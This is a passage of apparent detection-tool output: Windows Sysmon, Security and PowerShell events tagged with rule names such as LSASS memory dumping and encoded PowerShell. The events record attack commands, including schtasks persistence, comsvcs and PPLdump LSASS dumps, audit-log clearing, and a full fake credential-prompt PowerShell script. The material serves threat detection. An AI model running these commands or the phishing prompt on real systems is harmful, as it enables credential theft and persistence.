21:34:25.519"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4985,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:25.659355Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Indirect Command Execution"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\calc.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Calculator","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729","Image":"C:\\Windows\\System32\\calc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"forfiles /p c:\\windows\\system32 /m notepad.exe /c calc.exe","ParentImage":"C:\\Windows\\System32\\forfiles.exe","ParentProcessGuid":"747F3D96-6666-5D3F-0000-0010AE068E00","ParentProcessId":1464,"ProcessGuid":"747F3D96-6666-5D3F-0000-0010DF098E00","ProcessId":4336,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:30.552"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4989,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:30.807635Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Calculator Usage"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c schtasks /create /tn \"mysc\" /tr C:\\windows\\system32\\calc.exe /sc ONLOGON /ru \"System\" /f","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6670-5D3F-0000-001099048F00","ProcessId":2916,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:40.243"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":5000,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:40.261289Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Calculator Usage"],"event":{"Event":{"EventData":{"CommandLine":"schtasks /create /tn \"mysc\" /tr C:\\windows\\system32\\calc.exe /sc ONLOGON /ru \"System\" /f","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Task Scheduler Configuration Tool","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69","Image":"C:\\Windows\\System32\\schtasks.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c schtasks /create /tn \"mysc\" /tr C:\\windows\\system32\\calc.exe /sc ONLOGON /ru \"System\" /f","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6670-5D3F-0000-001099048F00","ParentProcessId":2916,"ProcessGuid":"747F3D96-6670-5D3F-0000-0010F9148F00","ProcessId":7076,"Product":"Microsoft® Windows® Operating System","RuleName":"Persistence - Scheduled Task Management","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:40.755"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":5002,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:40.889027Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was 
cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":1102,"EventRecordID":768617,"Execution_attributes":{"ProcessID":264,"ThreadID":796},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2020-09-15T19:28:17.594374Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"3B","SubjectLogonId":"0x4c331","SubjectUserName":"a-jbrown","SubjectUserSid":"S-1-5-21-308926384-506822093-3341789130-1106"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\whoami.exe\" /user","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-AB27-5CB8-0000-002021CA0000","LogonId":"0xca21","ParentCommandLine":"Powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"365ABB72-AC28-5CB8-0000-0010F3F70700","ParentProcessId":1200,"ProcessGuid":"365ABB72-AC38-5CB8-0000-0010365E0800","ProcessId":3576,"Product":"Microsoft® Windows® Operating System","RuleName":"technique_id=T1033,technique_name=System Owner/User 
Discovery","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-18 16:56:24.833"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":14,"Execution_attributes":{"ProcessID":3192,"ThreadID":3288},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-18T16:56:24.893827Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\whoami.exe\" /user","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-AB27-5CB8-0000-002021CA0000","LogonId":"0xca21","ParentCommandLine":"Powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"365ABB72-AC28-5CB8-0000-0010F3F70700","ParentProcessId":1200,"ProcessGuid":"365ABB72-AD19-5CB8-0000-0010F4F40C00","ProcessId":3980,"Product":"Microsoft® Windows® Operating System","RuleName":"technique_id=T1033,technique_name=System Owner/User Discovery","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-18 
17:00:09.677"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":24,"Execution_attributes":{"ProcessID":3192,"ThreadID":3288},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-18T17:00:09.977481Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-04-18 17:03:03.311","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-AB28-5CB8-0000-0010F2E20000","ProcessId":1388,"RuleName":"technique_id=T1187,technique_name=Forced Authentication","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\sysmon.evtx.lnk","UtcTime":"2019-04-18 17:03:03.311"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":32,"Execution_attributes":{"ProcessID":3192,"ThreadID":3288},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-04-18T17:03:03.321806Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - 
File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-04-18 17:03:03.441","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-AB28-5CB8-0000-0010F2E20000","ProcessId":1388,"RuleName":"technique_id=T1187,technique_name=Forced Authentication","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\HTools (vboxsrv) (D).lnk","UtcTime":"2019-04-18 17:03:03.441"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":33,"Execution_attributes":{"ProcessID":3192,"ThreadID":3288},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-04-18T17:03:03.441979Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["PowerShell Credential Prompt"],"event":{"Event":{"EventData":{"MessageNumber":1,"MessageTotal":1,"Path":"","ScriptBlockId":"c7ca7056-b317-4fff-b796-05d8ef896dcd","ScriptBlockText":"function Invoke-LoginPrompt{\n$cred = $Host.ui.PromptForCredential(\"Windows Security\", \"Please enter user credentials\", \"$env:userdomain\\$env:username\",\"\")\n$username = \"$env:username\"\n$domain = \"$env:userdomain\"\n$full = \"$domain\" + \"\\\" + \"$username\"\n$password = $cred.GetNetworkCredential().password\nAdd-Type -assemblyname System.DirectoryServices.AccountManagement\n$DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)\nwhile($DS.ValidateCredentials(\"$full\",\"$password\") -ne $True){\n $cred = $Host.ui.PromptForCredential(\"Windows Security\", \"Invalid Credentials, Please try again\", \"$env:userdomain\\$env:username\",\"\")\n $username = \"$env:username\"\n $domain = \"$env:userdomain\"\n $full = 
\"$domain\" + \"\\\" + \"$username\"\n $password = $cred.GetNetworkCredential().password\n Add-Type -assemblyname System.DirectoryServices.AccountManagement\n $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)\n $DS.ValidateCredentials(\"$full\", \"$password\") | out-null\n }\n $output = $newcred = $cred.GetNetworkCredential() | select-object UserName, Domain, Password\n $output\n R{START_PROCESS}\n}\nInvoke-LoginPrompt"},"System":{"Channel":"Microsoft-Windows-PowerShell/Operational","Computer":"MSEDGEWIN10","Correlation_attributes":{"ActivityID":"B5ABE6C2-675C-0001-A601-ACB55C67D501"},"EventID":4104,"EventRecordID":1123,"Execution_attributes":{"ProcessID":5500,"ThreadID":356},"Keywords":"0x0","Level":3,"Opcode":15,"Provider_attributes":{"Guid":"A0C1853B-5C40-4B15-8766-3CF1C58F985A","Name":"Microsoft-Windows-PowerShell"},"Security_attributes":{"UserID":"S-1-5-21-3461203602-4096304019-2269080069-1000"},"Task":2,"TimeCreated_attributes":{"SystemTime":"2019-09-09T13:35:09.315230Z"},"Version":1}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was 
cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"IEWIN7","Correlation":null,"EventID":1102,"EventRecordID":4987,"Execution_attributes":{"ProcessID":824,"ThreadID":6060},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-04-27T19:27:55.274060Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"IEWIN7","SubjectLogonId":"0xffa8","SubjectUserName":"IEUser","SubjectUserSid":"S-1-5-21-3583694148-1414552638-2922671848-1000"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog","xmlns:auto-ns3":"http://schemas.microsoft.com/win/2004/08/events"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Suspicious Encoded PowerShell Command Line","Shells Spawned by Web Servers"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -nop -noni -enc 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","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\Temp\\","Description":"Windows PowerShell","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B26B-5CEA-0000-002023240800","LogonId":"0x82423","ParentCommandLine":"c:\\windows\\system32\\inetsrv\\w3wp.exe -ap \"DefaultAppPool\" -v \"v2.0\" -l \"webengine4.dll\" -a \\\\.\\pipe\\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h \"C:\\inetpub\\temp\\apppools\\DefaultAppPool\\DefaultAppPool.config\" -w \"\" -m 0 
-t 20","ParentImage":"C:\\Windows\\System32\\inetsrv\\w3wp.exe","ParentProcessGuid":"365ABB72-3251-5CEB-0000-00109E06E100","ParentProcessId":748,"ProcessGuid":"365ABB72-3D4A-5CEB-0000-0010FA93FD00","ProcessId":2584,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IIS APPPOOL\\DefaultAppPool","UtcTime":"2019-05-27 01:28:42.700"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":5875,"Execution_attributes":{"ProcessID":324,"ThreadID":2260},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-27T01:28:42.711005Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","LSASS Memory Dump File Creation","UAC Bypass Using MSConfig Token Modification - File","Procdump Usage"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-03-17 19:09:41.318","Image":"C:\\Users\\IEUser\\Desktop\\procdump.exe","ProcessGuid":"365ABB72-9B75-5C8E-0000-0010013F1200","ProcessId":1856,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\lsass.exe_190317_120941.dmp","UtcTime":"2019-03-17 
19:09:41.318"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":4433,"Execution_attributes":{"ProcessID":344,"ThreadID":2032},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-03-17T19:09:41.328868Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","LSASS Memory Dump File Creation","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-03-17 19:10:02.058","Image":"C:\\Windows\\system32\\taskmgr.exe","ProcessGuid":"365ABB72-9B85-5C8E-0000-0010C4CC1200","ProcessId":3576,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\lsass (2).DMP","UtcTime":"2019-03-17 19:10:02.058"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":4441,"Execution_attributes":{"ProcessID":344,"ThreadID":2032},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-03-17T19:10:03.991455Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["WScript or CScript Dropper"],"event":{"Event":{"EventData":{"CommandLine":"cscript c:\\ProgramData\\memdump.vbs notepad.exe","Company":"Microsoft 
Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft ® Console Based Script Host","FileVersion":"5.812.10240.16384","Hashes":"SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC","Image":"C:\\Windows\\System32\\cscript.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-1B6A-5D69-0000-0020E5810E00","LogonId":"0xe81e5","ParentCommandLine":"C:\\Windows\\System32\\cmd.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-1B6C-5D69-0000-00106F060F00","ParentProcessId":2128,"ProcessGuid":"747F3D96-1C6F-5D69-0000-0010323C1F00","ProcessId":2576,"Product":"Microsoft ® Windows Script Host","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-30 12:54:07.823"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":32151,"Execution_attributes":{"ProcessID":3292,"ThreadID":928},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-08-30T12:54:07.873789Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["WMI Modules Loaded"],"event":{"Event":{"EventData":{"Company":"Microsoft Corporation","Description":"WMI","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=2E6A63BC5189CA5DF3E85CDF58593F3DF3935DE6,MD5=A081AAD3A296EB414CB6839B744C67C9,SHA256=3D77E7769CFC8B4A1098E9A1F2BDE4432A6A70253EA6C2A58C8F8403A9038288,IMPHASH=0D31E6D27B954AD879CB4DF742982F1A","Image":"C:\\Windows\\System32\\cscript.exe","ImageLoaded":"C:\\Windows\\System32\\wbem\\wmiutils.dll","ProcessGuid":"747F3D96-1C6F-5D69-0000-0010323C1F00","ProcessId":2576,"Product":"Microsoft® Windows® Operating System","RuleName":"Execution - Suspicious WMI module load","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2019-08-30 12:54:08.127"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":32153,"Execution_attributes":{"ProcessID":3292,"ThreadID":4120},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2019-08-30T12:54:08.257123Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Process Dump via Comsvcs DLL"],"event":{"Event":{"EventData":{"CommandLine":"rundll32 C:\\windows\\system32\\comsvcs.dll, MiniDump 4868 C:\\Windows\\System32\\notepad.bin full","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-1B6A-5D69-0000-0020E5810E00","LogonId":"0xe81e5","ParentCommandLine":"C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured 
-Embedding","ParentImage":"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe","ParentProcessGuid":"747F3D96-1C70-5D69-0000-0010D4551F00","ParentProcessId":1144,"ProcessGuid":"747F3D96-1C70-5D69-0000-0010C9661F00","ProcessId":2888,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-30 12:54:08.331"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":32154,"Execution_attributes":{"ProcessID":3292,"ThreadID":928},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-08-30T12:54:08.354049Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":1102,"EventRecordID":887106,"Execution_attributes":{"ProcessID":8,"ThreadID":6640},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2020-07-22T20:29:27.321769Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"3B","SubjectLogonId":"0x3a17a","SubjectUserName":"a-jbrown","SubjectUserSid":"S-1-5-21-308926384-506822093-3341789130-1106"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["LSASS Memory Dumping"],"event":{"Event":{"EventData":{"CommandLine":"PPLdump.exe -v lsass 
lsass.dmp","Company":"?","CurrentDirectory":"c:\\Users\\IEUser\\Desktop\\","Description":"?","FileVersion":"?","Hashes":"SHA1=F1C0C54AA13037F46F55B721F7E2A2349A30DBCF,MD5=DBCA6A3860A106333FF6BE6306B2B186,SHA256=68612B1C72B8AA498530ACEB929ED44F1837B8BC52D1269E30A834931434FC41,IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74","Image":"C:\\Users\\IEUser\\Desktop\\PPLdump.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-EFC5-6081-0000-00203ACE0B00","LogonId":"0xbce3a","OriginalFileName":"?","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-F040-6081-0000-001046AC1B00","ParentProcessId":4864,"ProcessGuid":"747F3D96-F415-6081-0000-001040FE4900","ProcessId":6316,"Product":"?","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2021-04-22 